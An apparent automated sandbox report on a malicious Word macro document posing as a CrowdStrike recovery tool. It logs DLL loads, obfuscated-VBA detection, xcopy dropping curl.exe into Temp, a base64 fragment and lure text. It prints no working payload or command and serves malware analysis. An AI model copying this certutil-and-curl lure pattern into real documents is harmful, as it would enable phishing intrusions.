Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/styles.xml

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: VBA code instrumentation

OLE, VBA macro, High number of string operations: Module ThisDocument

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,

Source: curl.exe.4.dr

Static PE information: section name: _RDATA

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Local\Temp\curl.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: Hyper-V settings
Source: curl.txt.5.dr	Binary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr	Binary or memory string: s Hyper-V settings.
Source: document.xml	Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color 